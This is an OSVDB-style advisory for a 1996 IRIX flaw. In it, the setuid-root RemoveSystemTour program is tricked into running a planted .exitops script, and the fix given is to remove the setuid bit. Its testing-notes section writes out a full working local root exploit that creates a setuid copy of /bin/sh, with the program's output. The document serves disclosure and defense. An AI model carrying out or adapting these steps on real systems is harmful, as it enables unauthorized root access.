IRIX RemoveSystemTour .exitops Privilege Escalation

1996-10-30T00:00:00
ID OSVDB:1012
Type osvdb
Reporter Tun-Hui Hu(hhui@stardot.net)
Modified 1996-10-30T00:00:00

Description

Vulnerability Description

IRIX contains a flaw that may allow a malicious user to gain unauthorized privileges. The issue is triggered when a malicious user manipulates environment variables and configuration files to trick the RemoveSystemTour program, which is setuid root, into executing a trojan horse. It is possible that the flaw may allow root privileges resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:

/bin/chmod u-s /usr/lib/tour/bin/RemoveSystemTour

/bin/chmod u-s /usr/people/tour/oob/bin/oobversions

Short Description

IRIX contains a flaw that may allow a malicious user to gain unauthorized privileges. The issue is triggered when a malicious user manipulates environment variables and configuration files to trick the RemoveSystemTour program, which is setuid root, into executing a trojan horse. It is possible that the flaw may allow root privileges resulting in a loss of integrity.

Manual Testing Notes

$ rbase=$HOME; export rbase $ mkdir -p $HOME/var/inst $ echo "dryrun: true" > $HOME/.swmgrrc $ cp -p /bin/sh /tmp/foobar $ printf '#!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops $ chmod a+x $HOME/var/inst/.exitops $ /usr/lib/tour/bin/RemoveSystemTour Executing outstanding exit-commands from previous session .. Successfully completed exit-commands from previous session. Reading installation history Checking dependencies ERROR : Software Manager: automatic installation failed: New target (nothing installed) and no distribution.

References:

ISS X-Force ID: 7456 CVE-1999-1384 Bugtraq ID: 470